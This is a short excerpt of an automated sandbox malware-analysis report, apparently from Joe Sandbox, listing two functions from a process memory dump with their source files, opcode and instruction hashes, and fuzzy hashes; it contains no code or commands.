                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.4131065320.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_a7d000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d485e1a87e51fc02202df26958e2eef3ff468c47479d1b060f7463bfef06bcc7
                                                                                                                                                                      • Instruction ID: 4d50eddfa77fc66b985399abcd7d9509d57d645b0b734a16d4667c0b6e9f65b0
                                                                                                                                                                      • Opcode Fuzzy Hash: d485e1a87e51fc02202df26958e2eef3ff468c47479d1b060f7463bfef06bcc7
                                                                                                                                                                      • Instruction Fuzzy Hash: 1421CF71504204EFCB14DF24D984B26BBB5FB84314F24CAA9E84E4B252C73AD847CA61
                                                                                                                                                                      Function 00A7D03F Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.4131065320.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_a7d000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                      • Instruction ID: df0513cee84cd6ef49f8e80dff962473940abc81742311b840b07a32fe42b8ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                      • Instruction Fuzzy Hash: 76118B75504284DFDB15CF14D9C4B16BFB2FB84314F28C6AED84A4B656C33AD84ACB62